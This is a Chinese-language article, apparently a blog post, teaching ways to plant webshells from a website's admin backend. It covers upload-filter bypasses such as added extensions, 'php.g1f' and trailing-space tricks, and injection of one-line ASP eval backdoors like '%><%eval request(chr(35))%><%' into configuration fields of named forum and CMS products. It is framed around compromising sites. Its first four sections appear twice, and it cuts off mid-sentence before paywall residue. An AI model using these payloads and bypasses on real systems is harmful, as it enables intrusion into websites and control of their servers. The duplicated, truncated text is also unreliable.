本文详细介绍了通过后台获取webshell的十大方法,包括直接上传、修改上传类型、利用管理功能写入、利用数据库备份恢复、数据库压缩、asp+mssql系统利用、php+mysql系统利用、phpwind论坛的三种方式以及其他利用网站计数系统等。这些方法涉及到多种脚本语言和数据库系统,对于网站安全维护具有重要参考价值。
前
言
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让 upfile . asp 上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站 webshell 还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到 webshell 的方法进行了总结和归纳,大体情况有以下十大方面。
注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。
一、直接上传获得 webshell
这种对 php 和 jsp 的一些程序比较常见, MolyX BOARD 就是其中一例,直接在心情图标管理上传. php 类型,虽然没有提示,其实已经成功了,上传的文 件 url 应该是 http : //forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。
二、添加修改上传类型
现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型, bbsxp 后台可以添加 asa | asP 类型, ewebeditor 的后台也可添加 asa 类型,通过修改后我们可以直接上传 asa 后缀的 webshell 了,还有一种情况是过滤了. asp ,可以添加. aspasp 的文件类型来上传获得 webshell 。 php 系统的后台,我们可以添加. php . g1f 的上传类型,这是 php 的一个特性,最后的哪个只要不是已知的文件类型即可, php 会将 php . g1f 作为. php 来正常运行,从而也可成功拿到 shell 。 LeadBbs3 . 14 后台获得 webshell 方法是:在上传类型中增加 asp ,注意, asp 后面是有个空格的,然后在前台上传 ASP 马,当然也要在后面加个空格!
三、利用后台管理功能写入 webshell
上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入 webshell 。比较的典型的有 dvbbs6 . 0 ,还有 leadbbs2 . 88 等,直接在后台修改配置文件,写入后缀是 asp 的文件。而 LeadBbs3 . 14 后台获得 webshell 另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符, http ://网站/ inc / IncHtm / BoardLink . asp 就是我们想要的 shell 。
四、利用后台管理向配置文件写 webshell
利用 """" : "" //"等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker at 263 dot net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker at 263 dot net/":eval request(chr(35))//",还有一种方法就是写上
cnhacker at 263 dot net "%><%eval request(chr(35))%><%’,这样就会形成前后对应,最小马也就
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让 upfile . asp 上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站 webshell 还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到 webshell 的方法进行了总结和归纳,大体情况有以下十大方面。
注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。
一、直接上传获得 webshell
这种对 php 和 jsp 的一些程序比较常见, MolyX BOARD 就是其中一例,直接在心情图标管理上传. php 类型,虽然没有提示,其实已经成功了,上传的文 件 url 应该是 http : //forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。
二、添加修改上传类型
现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型, bbsxp 后台可以添加 asa | asP 类型, ewebeditor 的后台也可添加 asa 类型,通过修改后我们可以直接上传 asa 后缀的 webshell 了,还有一种情况是过滤了. asp ,可以添加. aspasp 的文件类型来上传获得 webshell 。 php 系统的后台,我们可以添加. php . g1f 的上传类型,这是 php 的一个特性,最后的哪个只要不是已知的文件类型即可, php 会将 php . g1f 作为. php 来正常运行,从而也可成功拿到 shell 。 LeadBbs3 . 14 后台获得 webshell 方法是:在上传类型中增加 asp ,注意, asp 后面是有个空格的,然后在前台上传 ASP 马,当然也要在后面加个空格!
三、利用后台管理功能写入 webshell
上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入 webshell 。比较的典型的有 dvbbs6 . 0 ,还有 leadbbs2 . 88 等,直接在后台修改配置文件,写入后缀是 asp 的文件。而 LeadBbs3 . 14 后台获得 webshell 另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符, http ://网站/ inc / IncHtm / BoardLink . asp 就是我们想要的 shell 。
四、利用后台管理向配置文件写 webshell
利用 """" : "" //"等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker at 263 dot net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker at 263 dot net/":eval request(chr(35))//",还有一种方法就是写上
cnhacker at 263 dot net "%><%eval request(chr(35))%><%’,这样就会形成前后对应,最小马也就
最低0.47元/天 解锁文章
2593
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
